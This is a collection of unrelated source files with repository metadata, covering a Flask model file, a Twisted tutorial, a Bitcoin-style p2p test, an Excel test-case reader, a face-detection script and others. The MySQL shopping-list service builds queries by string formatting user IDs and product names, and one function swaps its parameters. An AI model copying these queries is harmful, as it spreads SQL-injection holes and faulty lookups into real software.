args = CONF(config_files=config_files, args=argv)
if len(args) < 2:
CONF.print_help()
print_commands(CMDS)
sys.exit(1)
cmd = args[1]
if cmd in CMDS:
return run(cmd, (args[:1] + args[2:]))
else:
print_commands(CMDS)
sys.exit("Unknown command: %s" % cmd)
|
[
"c@c-Latitude-E6410.(none)"
] |
c@c-Latitude-E6410.(none)
|
80fa29ace4588b9060f696b19bc728f82cbc9939
|
149b139871110353d5ec5a34cd99b2d9b03233e0
|
/backend/br/jus/tredf/analysis/backend/model/models.py
|
674f5f5e1615ce32588de17c4b92c3b40dda580e
|
[] |
no_license
|
alisonsilva/python
|
ca9a99700086d724605d286f05045b40713c9b07
|
de7b31e2279c081750e8ad13b04816e122ff253b
|
refs/heads/master
| 2020-03-07T19:14:17.802736
| 2018-04-26T13:47:05
| 2018-04-26T13:47:05
| 127,665,603
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,816
|
py
|
from datetime import datetime
from br.jus.tredf.analysis.backend.conf import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
posts = db.relationship('Post', backref='author', lazy='dynamic')
def __repr__(self):
return '<User {}>'.format(self.username)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post {}>'.format(self.body)
class IpAddress(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.String(20))
log_entries = db.relationship('LogEntry', backref='ip_address', lazy='select')
occurrences = db.relationship('Occurrence', backref='ip_address', lazy='select')
class LogEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
instant = db.Column(db.DateTime, index=True, default=datetime.utcnow)
request = db.Column(db.String(100))
status = db.Column(db.Integer)
user_agent = db.Column(db.String(255))
ip_addressid = db.Column(db.Integer, db.ForeignKey('ip_address.id'), nullable=False)
class Occurrence(db.Model):
id = db.Column(db.Integer, primary_key=True)
threshold = db.Column(db.Integer)
duration = db.Column(db.String(20))
start_date = db.Column(db.DateTime, default=datetime.utcnow)
comments = db.Column(db.String(255))
qtd_found = db.Column(db.Integer)
ip_addressid = db.Column(db.Integer, db.ForeignKey("ip_address.id"), nullable=False)
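# Example usage (sketch; assumes the Flask-SQLAlchemy session from
# br.jus.tredf.analysis.backend.conf is configured):
# ip = IpAddress(value='10.0.0.1')
# entry = LogEntry(request='GET /', status=200, user_agent='curl/7.64', ip_address=ip)
# db.session.add_all([ip, entry])
# db.session.commit()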
|
[
"alisonsilva123@gmail.com"
] |
alisonsilva123@gmail.com
|
77842a6aee9b5ded6310e374e78ec44dfddb45bd
|
d2cb930ed5df0b1b5f7944e00f6f884bf014803d
|
/douban/twisted-demo.py
|
fcf677fc5cecf53c84cde258c7d3baea35271f91
|
[] |
no_license
|
sixDegree/python-scrapy-demo
|
3cae4298b01edab65449cfe9af56b2fa59f4c07d
|
b66530e54156be8c7877f1fc4d497fd497b6fdda
|
refs/heads/master
| 2020-06-17T03:16:23.038061
| 2019-07-08T09:25:15
| 2019-07-08T09:25:15
| 195,777,787
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,184
|
py
|
from twisted.internet import reactor # event loop (terminates automatically once all sockets have been removed)
from twisted.internet import defer # defer.Deferred: a special socket-like object (must be fired manually and removed manually)
from twisted.internet import task
import treq # used to send asynchronous requests; returns Deferred objects
import time
# The deferred mechanism:
# A Deferred represents a value that cannot be obtained immediately.
def demo_defer1():
d = defer.Deferred()
print("called:", d.called) # False
print("call...")
d.callback("Hello")
print("called:", d.called) # True
print("result:", d.result) # Hello
def demo_defer2():
def done(v):
print("done called")
return "Hello " + v
d = defer.Deferred()
d.addCallback(done)
print("called:", d.called) # False
print("call...")
d.callback("Tom")
print("called:", d.called) # True
print("result:", d.result) # Hello Tom
def demo_defer3():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
a.callback(3) # b_callback called with arg = 3
print(status(a, b)) # [(<Deferred at 0x1047a0da0>, 1), ('N/A', 1)]
b.callback(4) # on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer4():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
b.callback(4)
print(status(a, b)) # [('N/A', 2), (4, 0)]
a.callback(3) # b_callback called with arg = 3
# on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer5():
def on_done(arg):
print("on_done called with arg =", arg)
return arg
dfds = [defer.Deferred() for i in range(5)]
defer.DeferredList(dfds).addCallback(on_done)
for i in range(5):
dfds[i].callback(i)
# on_done called with arg = [(True, 0), (True, 1), (True, 2), (True, 3), (True, 4)]
    # on_done is only called after every Deferred in the list has fired (via callback(...))
def demo_reactor1():
def done(arg):
print("Done", arg)
def defer_task():
print("Start")
d = defer.Deferred()
time.sleep(3)
d.callback("123")
return d
def stop():
reactor.stop()
defer_task().addCallback(done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor2():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
def defer_task(i):
print("Start", i)
d = defer.Deferred()
d.addCallback(done)
time.sleep(2)
d.callback(i)
return d
def stop():
print("Stop reactor")
reactor.stop()
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addCallback(all_done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor3():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
print("Stop reactor")
reactor.stop()
def defer_task(i):
print("Start", i)
return task.deferLater(reactor, 2, done, i)
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addBoth(all_done)
# dfds.addCallback(all_done)
# reactor.callLater(5, stop)
reactor.run()
def demo_treq_get(url):
def get_done(response):
print("get response:", response)
reactor.stop()
treq.get(url).addCallback(get_done)
reactor.run()
def main():
@defer.inlineCallbacks
def my_task1():
print("Start task1")
url = "http://www.baidu.com"
d = treq.get(url.encode('utf-8'))
d.addCallback(parse)
yield d
def my_task2():
print("Start task2")
return task.deferLater(reactor, 2, parse, "200")
@defer.inlineCallbacks # need use `yield`
def my_task3():
print("Start task3")
yield task.deferLater(reactor, 2, parse, "400")
def parse(response):
print("parse response:", response)
def all_done(arg):
print("All done", arg)
reactor.stop()
dfds = defer.DeferredList([my_task1(), my_task2(), my_task3(), ])
dfds.addBoth(all_done)
reactor.run()
if __name__ == "__main__":
# demo_defer1()
# demo_defer2()
# demo_defer3()
# demo_defer4()
# demo_defer5()
# demo_reactor1()
# demo_reactor2()
# demo_reactor3()
# demo_treq_get('http://www.baidu.com')
main()
|
[
"chenjin.zero@163.com"
] |
chenjin.zero@163.com
|
d6b7f74c1a8958d8c0d2b441c408b1a559b1d5a0
|
1d21b7bc9205c9c2acd8b8fd8ee75dec93e974d4
|
/qa/rpc-tests/p2p-acceptblock.py
|
db03aff39949a8e3e99ec7b3f0a24f9f5da34678
|
[
"MIT"
] |
permissive
|
ZioFabry/LINC2
|
494d12be6034b7f5999960e3f3ed62f154be7ab8
|
a2e0e06cf68771a82bb1d4da30e0c914c8589bbe
|
refs/heads/master
| 2020-05-22T18:28:27.590171
| 2019-05-13T19:51:49
| 2019-05-13T19:51:49
| 186,471,965
| 0
| 0
|
MIT
| 2019-05-13T18:10:28
| 2019-05-13T18:10:27
| null |
UTF-8
|
Python
| false
| false
| 12,328
|
py
|
#!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
   Node0 should figure out that it is missing the height 2 block and send a
   getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class AcceptBlockTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LINCD", "lincd"),
help="bitcoind binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
binary=self.options.testbinary))
self.nodes.append(start_node(1, self.options.tmpdir,
["-debug", "-whitelist=127.0.0.1"],
binary=self.options.testbinary))
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = TestNode() # connects to node0 (not whitelisted)
white_node = TestNode() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int ("0x" + n.getbestblockhash() + "L", 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in xrange(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
print "First height 2 block accepted by both nodes"
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in xrange(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
print "Second height 2 block accepted only from whitelisted peer"
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in xrange(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
try:
self.nodes[0].getblock(blocks_h3[0].hash)
print "Unrequested more-work block accepted from non-whitelisted peer"
except:
raise AssertionError("Unrequested more work block was not processed")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
print "Successfully reorged to length 3 chain from whitelisted peer"
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in xrange(2):
for i in xrange(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
for x in all_blocks:
try:
self.nodes[0].getblock(x.hash)
if x == all_blocks[287]:
raise AssertionError("Unrequested block too far-ahead should have been ignored")
except:
if x == all_blocks[287]:
print "Unrequested block too far-ahead not processed"
else:
raise AssertionError("Unrequested block with more work should have been accepted")
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
try:
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
print "Unrequested block far ahead of tip accepted from whitelisted peer"
except:
raise AssertionError("Unrequested block from whitelisted peer not accepted")
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
print "Unrequested block that would complete more-work chain was ignored"
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_getdata = None
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_getdata
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
print "Inv at tip triggered getdata for unprocessed block"
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
print "Successfully reorged to longer chain from non-whitelisted peer"
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
|
[
"root@vultr.guest"
] |
root@vultr.guest
|
7b4c48f9072d0d8d3c8bdefc2ff22386e5ca805f
|
c68f8159b2f396d0718f71a1e0eb3fa31058b62f
|
/analytics/urls.py
|
a434fda5659c24a2cdfc3e1b3d2fa7a23578504a
|
[] |
no_license
|
hamideshoun/url_shortener
|
ed5c20018db385cf384cc4fcca691db7d025cdd0
|
27fb116d20662c349edfaa89dbc59a798819ff68
|
refs/heads/master
| 2023-06-14T12:54:07.283495
| 2021-07-08T00:50:18
| 2021-07-08T00:50:18
| 383,959,929
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 138
|
py
|
from django.urls import path
from analytics.views import ReportAPIView
urlpatterns = [
path('reports/', ReportAPIView.as_view()),
]
|
[
"hamid.naraghi@gmail.com"
] |
hamid.naraghi@gmail.com
|
ad04ab061a5956176bed1dea790659a21862a6d9
|
81e40b229182662606ba521c60386790b4163d10
|
/shopping-elf/data-microservice/processed_data_service.py
|
78852c22d17b3dce1c926f04b902b31d5a77178a
|
[] |
no_license
|
neilthaker07/Shopping-Elf
|
64e1dc23b012cac4969bfded1c569b1a2e4818df
|
dd214503b240dc4092d1c7d2244bca1a37a1f357
|
refs/heads/master
| 2020-05-31T21:35:11.600984
| 2017-05-21T17:41:21
| 2017-05-21T17:41:21
| 94,049,664
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,867
|
py
|
import mysql.connector
from Models import ShoppingItems
from Models import ShoppingList
import collections
import DbConstants
def getShoppingList(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name,DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),days,quantity,ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY))) as last FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(ShoppingItems(each_row[0],each_row[1],each_row[2],each_row[3],each_row[4]));
cur.close()
db.close()
return formatShoppingData(shoppingList);
def getShoppingListProducts(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(each_row[0]);
cur.close()
db.close()
return shoppingList;
def getProductConsumption(userid,product_name):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),bill_date, qty FROM shopping_elf.receipt_data where product_name='%s' and userid= '%s'"
cur.execute(query %(userid,product_name) )
rows=cur.fetchall()
sList = [];
for each_row in rows:
d = collections.OrderedDict()
d['date'] = each_row[0];
        d['quantity'] = each_row[2];  # qty is the third selected column
sList.append(d)
cur.close()
db.close()
return sList;
def getNotificationData():
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "select i.user_id,u.user_api_key, i.product_name from shopping_elf.inventory i , shopping_elf.`user` u where DATEDIFF(NOW(),invoice_date) +1 = days and u.username=i.user_id order by user_id"
cur.execute(query)
rows=cur.fetchall()
notificationsList=collections.OrderedDict()
for each_row in rows:
if(each_row[1] in notificationsList):
productList = notificationsList[each_row[1]]
productList.append(each_row[2])
else:
productList=[]
productList.append(each_row[2])
notificationsList[each_row[1]] =productList
cur.close()
db.close()
return notificationsList;
def formatShoppingData(shoppingList):
sList =[];
for eachData in shoppingList:
d = collections.OrderedDict()
        d['productName'] = eachData.productName;
d['lastBilldate'] = eachData.billDate;
d['estimate_days'] = eachData.estimate_days;
d['quantity'] = eachData.quantity;
d['estimated_days_to_last'] = eachData.estimated_days_to_last;
sList.append(d)
return sList;
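# Note: a parameterized query (sketch) avoids manual quoting and injection risks:
# cur.execute("SELECT ... WHERE product_name=%s AND userid=%s", (product_name, userid))
# mysql.connector substitutes the tuple values safely.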
|
[
"rashmishrm74@gmail.com"
] |
rashmishrm74@gmail.com
|
c93c5ccd6c588a6c7f2b024b62acc6badd12163b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/HDGiiCmSgJeeu3388_19.py
|
09b87a15f58f460743f3b6ef6eaacc88c698ba44
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 904
|
py
|
"""
A fuse melts when a current in an electrical device exceeds the fuse's rating,
breaking the circuit and preventing the heat from building up too much (which
can cause a fire). The ideal fuse to choose is **higher** than the device's
current output, yet **as close as possible** to it as well.
Given a list of _fuse ratings_ , and the _device's current output_ , return
which of the fuses is the best for the device.
### Examples
choose_fuse(["3V", "5V", "12V"], "4.5V") ➞ "5V"
choose_fuse(["5V", "14V", "2V"], "5.5V") ➞ "14V"
choose_fuse(["17V", "15V", "12V"], "9V") ➞ "12V"
### Notes
* You will be given three possible ratings in voltage.
* Fuses may not be in a sorted order.
* Assume that there is a valid fuse in every test case
"""
def choose_fuse(f, c):
    f = [int(e[:-1]) for e in f if float(e[:-1]) > float(c[:-1])]  # strictly higher than the output
return str(min(f))+'V'
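# Equivalent formulation (sketch) keeping the strict "higher than" rule:
# def choose_fuse(f, c):
#     return min((e for e in f if float(e[:-1]) > float(c[:-1])),
#                key=lambda e: float(e[:-1]))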
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
7416cbc73d6ba31ae6410ac8ec422a06a219270e
|
4ca5ad12b083ed7dd8d5132bc9e66d4dea326dda
|
/WebClass/web_11_自动化测试框架V1/common/handle_excel.py
|
a06471baff2cf97acf86513f147a3ab66d7e499b
|
[] |
no_license
|
ybsgithup/Code
|
7b279f68d96908f2ae44d21e3da335110bc308e4
|
bbc2018e6a7ce7293c5effb409d7a6279033ae15
|
refs/heads/master
| 2022-11-23T23:02:48.908126
| 2020-07-27T04:24:38
| 2020-07-27T04:24:38
| 276,266,634
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,465
|
py
|
import os
from openpyxl import load_workbook
class Testcase:
pass
class HandleExcel:
def __init__(self, filename, sheetname=None):
self.filename = filename
self.sheetname = sheetname
def read_data(self):
"""
        Read the test-case data from the workbook.
:return:
"""
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
testcases_list = []
        headers_list = []  # holds the header-row values
for row in range(1, ws.max_row + 1):
            # holds the case data for each row
            # one_row_dict = {}
            one_testcase = Testcase()  # create a test-case object
for column in range(1, ws.max_column + 1):
one_cell_value = ws.cell(row, column).value
if row == 1:
# headers_list.append(one_cell_value)
                    # convert the fetched header to a string and append it to headers_list
headers_list.append(str(one_cell_value))
else:
                    # get the header string for this column
key = headers_list[column - 1]
# one_row_dict[key] = one_cell_value
if key == "actual":
                        # set the actual_column attribute to the column number holding the actual response
setattr(one_testcase, "actual_column", column)
elif key == "result":
                        # set the result_column attribute to the column number holding the execution result
setattr(one_testcase, "result_column", column)
setattr(one_testcase, key, one_cell_value)
if row != 1:
# testcases_list.append(one_row_dict)
                # set the row attribute to the row number of the current test case
setattr(one_testcase, "row", row)
testcases_list.append(one_testcase)
return testcases_list
'''
def write_data(self, row, column, data):
"""
        Write operation
        :param row: the row to write to
        :param column: the column to write to
        :param data: the data to be written
:return:
"""
        # Writing data to the workbook must not share a Workbook object with the read operation;
        # if the same Workbook object is used, only the last write succeeds and unexpected results occur
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
        # First way to write:
# one_cell = ws.cell(row, column)
# one_cell.value = data
        # Second way to write:
ws.cell(row, column, value=data)
wb.save(self.filename)
'''
def write_data(self, one_testcase, actual_value, result_value):
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
        # Second way to write:
ws.cell(one_testcase.row, one_testcase.actual_column, value=actual_value)
ws.cell(one_testcase.row, one_testcase.result_column, value=result_value)
wb.save(self.filename)
if __name__ == '__main__':
excel_filename = "../data/test_case.xlsx"
sheet_name = "cases_error"
do_excel = HandleExcel(excel_filename, sheet_name)
do_excel.read_data()
pass
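    # write_data usage (sketch): write an actual response and a result back
    # for the first case read above:
    # cases = do_excel.read_data()
    # do_excel.write_data(cases[0], actual_value='{"code": 0}', result_value='Pass')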
|
[
"ybsfile@163.com"
] |
ybsfile@163.com
|
794d7b71c405e3df9b2868475614e966c73424c3
|
d6a752aefedf14439236017f2de98e5d40823f57
|
/bb2-07-05-face.py
|
b5cb5a5b17b2af28c03e731f69654c3e271a7e43
|
[] |
no_license
|
norihisayamada/opencv_bluebacks
|
918b243f178f4170f64a181e5d7dca262d6b85b4
|
df2cfadadc3f7a66eeb9784aa9427aa5cacd61b5
|
refs/heads/master
| 2022-11-12T02:10:09.345084
| 2020-07-10T03:02:36
| 2020-07-10T03:02:36
| 278,521,091
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,618
|
py
|
# -*- coding: utf-8 -*-
import picamera
import picamera.array
import cv2
cascade_path = "/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml"
cascade = cv2.CascadeClassifier(cascade_path)
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as stream:
camera.resolution = (320, 240)
camera.framerate = 15
while True:
# capture a frame into stream.array in BGR order
camera.capture(stream, 'bgr', use_video_port=True)
# convert the frame to a grayscale image, gray
gray = cv2.cvtColor(stream.array, cv2.COLOR_BGR2GRAY)
# search gray for faces
facerect = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(30,30), maxSize=(150,150))
if len(facerect) > 0:
for rect in facerect:
# draw a red rectangle on the original frame (stream.array) where a face was found
# rect[0:2]: top-left corner of the rectangle; rect[2:4]: its width and height
# rect[0:2]+rect[2:4]: bottom-right corner of the rectangle
cv2.rectangle(stream.array, tuple(rect[0:2]),tuple(rect[0:2]+rect[2:4]), (0,0,255), thickness=2)
# show stream.array in a window
cv2.imshow('frame', stream.array)
# "q"を入力でアプリケーション終了
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# reset the stream
stream.seek(0)
stream.truncate()
cv2.destroyAllWindows()
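# Hedged usage note: this script targets a Raspberry Pi with the camera
# module enabled; the cascade path above is where Debian's OpenCV packages
# install the frontal-face model. Press "q" in the preview window to exit.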
|
[
"sus444norihisa@gmail.com"
] |
sus444norihisa@gmail.com
|
d8595f38931efaebad9121c07fafd55b564816a1
|
8be96a7791e50165b8849e69b1cf6a04869f2400
|
/run.py
|
58b06c7a845124aa433ff1a33ae2569c92e3b3e8
|
[] |
no_license
|
nosoccus/department-app
|
458b38387571d7dead37ff87b8dfda91cd0717fb
|
f822d1e05db5d869ab583a3a93e9e58d9100022a
|
refs/heads/main
| 2023-01-29T18:42:37.975524
| 2020-12-14T23:26:56
| 2020-12-14T23:26:56
| 317,921,415
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
import app
if __name__ == "__main__":
app.create_app().run(debug=True)
|
[
"rostyk.holoven@gmail.com"
] |
rostyk.holoven@gmail.com
|
c98bf9af78911012a5d580d8fab568dc0dd4d262
|
5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8
|
/client/gui_lib/GUIElement.py
|
9e1b3576bea5c0ed0b0177d38d061da26e549710
|
[] |
no_license
|
sheepsy90/survive
|
26495f1ff2d8247fbb9470882f8be9f5272e7f2c
|
0eddf637be0eacd34415761b78fc2c9d50bc1528
|
refs/heads/master
| 2021-01-09T05:55:16.546762
| 2017-02-03T20:15:28
| 2017-02-03T20:15:28
| 80,864,391
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,463
|
py
|
import pygame
class GUIElement(object):
TEXT = 2
BUTTON = 1
def __init__(self, name, rect):
self.name = name
self.x, self.y, self.width, self.height = rect
self.is_hover = False
self.gui_handler = None
self.focus = False
self.visible = True
self.z_order = 0
self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)
def set_zorder(self, order):
self.z_order = order
def get_zorder(self):
return self.z_order
def get_name(self):
return self.name
def set_hover_state(self, mx, my):
